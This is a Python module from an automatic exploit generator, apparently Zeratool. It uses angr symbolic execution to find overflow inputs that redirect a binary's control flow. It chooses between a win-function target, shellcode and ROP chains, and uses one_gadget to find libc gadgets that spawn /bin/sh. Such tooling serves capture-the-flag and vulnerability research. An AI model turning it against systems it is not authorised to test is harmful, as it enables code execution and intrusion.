import angr
import claripy
import time
import timeout_decorator
import IPython
import r2pipe
import json
import os
import subprocess
from struct import pack
from angr import sim_options as so
from zeratool import puts_model, printf_model, malloc_model
from .simgr_helper import hook_four
import logging

log = logging.getLogger(__name__)

# from pwn import *

from .simgr_helper import (
    point_to_win_filter,
    point_to_shellcode_filter,
    point_to_ropchain_filter,
)
from .radare_helper import getRegValues, findShellcode, get_base_addr


"""
one_gadget is written in Ruby, so we need to call it externally.
The gadget addresses it reports are all offsets into libc.
"""


def getOneGadget(properties):
    """Return the one_gadget RCE offsets for the libc named in *properties*.

    one_gadget is an external (Ruby) tool, so it is run as a subprocess and
    its stdout is scanned. Only output lines that mention ``/bin/sh`` are
    kept; for each, the first space-separated token (the gadget address as
    printed by one_gadget, e.g. ``"0x4f2c5"``) is returned.

    Args:
        properties: analysis properties dict. Reads ``"libc"`` (path to the
            libc to scan; required) and ``"libc_base"`` (only checked so a
            notice can be logged when it is missing or None).

    Returns:
        list[str]: the address tokens, in one_gadget's output order.

    Exits the process via ``exit(0)`` when no libc is configured.
    """
    libc_path = properties.get("libc")
    if libc_path is None:
        log.info("[-] One gadget RCE relies on libc. Please add libc")
        exit(0)
    if properties.get("libc_base") is None:
        log.info("[~] No libc base address specified. Chains will use 0x0 as base")

    # If installed using helper script, one_gadget should be on $PATH.
    # argv is passed as a list (no shell involved), and stdout arrives as
    # bytes on Python 3, so it is decoded before line splitting.
    result = subprocess.run(
        ["one_gadget", libc_path], stdout=subprocess.PIPE, check=False
    )
    lines = result.stdout.decode("utf-8", errors="replace").splitlines()

    gadget_addrs = []
    # Only grab the addresses
    for line in lines:
        if "/bin/sh" in line:
            log.info("[+] {}".format(line))
            gadget_addrs.append(line.split(" ")[0])

    return gadget_addrs


def _load_overflow_project(binary_name, properties):
    """Create the angr Project used for overflow exploration.

    A user-supplied libc (``properties["libc"]``, when truthy and not a dict)
    is force-loaded at ``properties["libc_base_address"]`` (default 0x500000).
    If the main object is position independent, the project is reloaded with
    the main object rebased to ``get_base_addr(binary_name)``; the forced-libc
    options are kept for that reload.
    """
    # Extra keys here are forwarded by angr.Project to cle.Loader, exactly as
    # if they had been passed as keyword arguments.
    load_options = {"auto_load_libs": False}
    libc_path = properties.get("libc", None)
    if libc_path and not isinstance(libc_path, dict):
        libc_base_addr = properties.get("libc_base_address", 0x500000)
        load_options["force_load_libs"] = [libc_path]
        load_options["lib_opts"] = {
            os.path.basename(libc_path): {"base_addr": libc_base_addr}
        }

    p = angr.Project(binary_name, load_options=dict(load_options))
    if p.loader.main_object.pic:
        log.info("Binary is PIC getting base addr")
        base_addr = get_base_addr(binary_name)
        p = angr.Project(
            binary_name,
            load_options=dict(load_options, main_opts={"base_addr": base_addr}),
        )
    return p


def _hook_overflow_models(p):
    """Hook rand/srand, puts, the printf family and malloc with zeratool models."""
    p.hook_symbol("rand", hook_four())
    p.hook_symbol("srand", hook_four())
    p.hook_symbol("puts", puts_model.putsFormat())

    # (symbol, argument given to printf_leak_detect). The number looks like the
    # format-string argument position. NOTE(review): vprintf's format is its
    # first argument, yet it is given 1 (unchanged from the original). Confirm
    # against printf_leak_detect.
    printf_family = (
        ("printf", 0),
        ("fprintf", 1),
        ("dprintf", 1),
        ("sprintf", 1),
        ("snprintf", 2),
        ("vprintf", 1),
        ("vfprintf", 1),
        ("vdprintf", 1),
        ("vsprintf", 1),
        ("vsnprintf", 2),
    )
    for symbol, fmt_arg in printf_family:
        # A fresh model instance per symbol, as each hook gets its own procedure.
        p.hook_symbol(symbol, printf_model.printf_leak_detect(fmt_arg))

    p.hook_symbol("malloc", malloc_model.malloc_addr_tracker())


def _apply_register_values(state, reg_values):
    """Store every register value in *reg_values* that *state*'s arch knows about."""
    for register in list(state.arch.register_names.values()):
        if register in reg_values:  # registers absent from reg_values are left alone
            state.registers.store(register, reg_values[register])


def exploitOverflow(binary_name, properties, inputType="STDIN"):
    """Symbolically explore *binary_name* for an exploitable overflow.

    The input is a 400-byte symbolic buffer. It is fed to the program
    according to *inputType*:

    * ``"STDIN"``: fed on stdin from ``full_init_state``.
    * ``"LIBPWNABLE"``: fed on stdin, starting at the ``handle_connection``
      symbol.
    * Anything else: passed as ``argv[1]``.

    Exploration is steered by the filter returned from ``pickFilter`` and
    stops at the first state whose globals contain ``"type"``. It is bounded
    by a 1200 s timeout.

    Args:
        binary_name: path to the target binary.
        properties: analysis properties dict. Keys read here are:

            * ``"pwn_type"``: must be a dict; its ``"results"`` entry is used
              as the returned dict.
            * ``"libc"`` and ``"libc_base_address"``.
            * ``"protections"``: its ``"pie"`` entry.

            ``pickFilter`` reads further keys.
        inputType: how the symbolic input reaches the program (see above).

    Returns:
        The ``run_environ`` dict. ``"type"`` is always present. On success,
        ``"input"`` is set, plus leak- or dlresolve-specific keys when
        ``"type"`` is ``"leak"`` or ``"dlresolve"``. On timeout or when no
        state is found, it is returned without those additions.
    """
    run_environ = properties["pwn_type"].get("results", {})
    run_environ["type"] = run_environ.get("type", None)

    p = _load_overflow_project(binary_name, properties)
    _hook_overflow_models(p)

    extras = {so.REVERSE_MEMORY_NAME_MAP, so.TRACK_ACTION_HISTORY, so.TRACK_CONSTRAINTS}
    has_pie = properties.get("protections", {}).get("pie", False)

    # Setup state based on input type
    argv = [binary_name]
    input_arg = claripy.BVS("input", 400 * 8)
    if inputType == "STDIN":
        entry_addr = p.loader.main_object.entry
        if not has_pie:
            reg_values = getRegValues(binary_name, entry_addr)
        state = p.factory.full_init_state(
            args=argv,
            add_options=extras,
            stdin=input_arg,
            env=os.environ,
        )
        if not has_pie:
            # Seed registers with the values getRegValues reports at the entry point.
            _apply_register_values(state, reg_values)

    elif inputType == "LIBPWNABLE":
        handle_connection = p.loader.main_object.get_symbol("handle_connection")
        start_addr = handle_connection.rebased_addr

        reg_values = getRegValues(binary_name, start_addr)

        state = p.factory.entry_state(
            args=argv,
            env=os.environ,
            addr=start_addr,
            add_options=extras,
            stdin=input_arg,
        )
        if not has_pie:
            _apply_register_values(state, reg_values)

    else:
        argv.append(input_arg)
        state = p.factory.full_init_state(args=argv, add_options=extras)

    state.globals["needs_leak"] = True
    if run_environ["type"] == "leak":
        # A previous run found a leak: pin the start of the symbolic input to
        # the recorded leak input, byte by byte.
        state.globals["needs_leak"] = False
        state.globals["leak_input"] = run_environ["leak_input"]
        for x, y in enumerate(run_environ["leak_input"]):
            state.add_constraints(input_arg.get_byte(x) == y)

    state.libc.buf_symbolic_bytes = 0x100
    state.globals["user_input"] = input_arg
    state.globals["inputType"] = inputType
    state.globals["properties"] = properties
    simgr = p.factory.simgr(state, save_unconstrained=True)

    step_func = pickFilter(simgr, properties)
    if step_func is None:
        log.info("[-] Error could not device exploit strategy")
        exit(1)

    # Exploration runs only inside the timeout wrapper. An unguarded explore()
    # before it would have no time limit and would duplicate the work.
    @timeout_decorator.timeout(1200)
    def exploreBinary(simgr):
        simgr.explore(find=lambda s: "type" in s.globals, step_func=step_func)

    try:
        exploreBinary(simgr)
    except (KeyboardInterrupt, timeout_decorator.TimeoutError):
        log.info("[~] Overflow check timed out")
        return run_environ

    if not simgr.found:
        log.info("[-] No exploitable state found")
        return run_environ

    end_state = simgr.found[0]
    run_environ["type"] = end_state.globals["type"]
    if run_environ["type"] == "leak":
        run_environ["leak_input"] = end_state.globals["leak_input"] + b"\n"
        run_environ["leak_output"] = end_state.globals["output_before_leak"]
        run_environ["leaked_function"] = end_state.globals["leaked_func"]

    if run_environ["type"] == "dlresolve":
        run_environ["dlresolve_first"] = end_state.globals["dlresolve_first"]
        run_environ["dlresolve_second"] = end_state.globals["dlresolve_second"]

    run_environ["input"] = end_state.globals.get("input", None)

    log.info("[+] Triggerable with input : {}".format(run_environ["input"]))
    return run_environ


def pickFilter(simgr, properties):
    """Choose the exploration step filter that steers toward an exploit.

    Preference order:

    1. ``point_to_win_filter``, when ``properties["win_functions"]`` is truthy.
    2. ``point_to_shellcode_filter``, when NX is off
       (``properties["protections"]["nx"]`` falsy) and
       ``properties["force_shellcode"]`` is truthy.
    3. ``point_to_ropchain_filter`` otherwise.

    NX is assumed enabled when it is not recorded in ``properties``.

    Args:
        simgr: the simulation manager. It is not used here and is kept for
            API compatibility.
        properties: analysis properties dict.

    Returns:
        One of the three filter callables; never None.
    """
    if properties.get("win_functions", None):
        log.info("[+] Using point to win function technique")
        return point_to_win_filter

    has_nx = properties.get("protections", {}).get("nx", True)
    force_shellcode = properties.get("force_shellcode", False)
    if not has_nx and force_shellcode:
        log.info("[+] Binary does not have NX")
        log.info("[+] Placing shellcode and pointing")
        return point_to_shellcode_filter

    log.info("[+] Building rop and pointing")
    return point_to_ropchain_filter
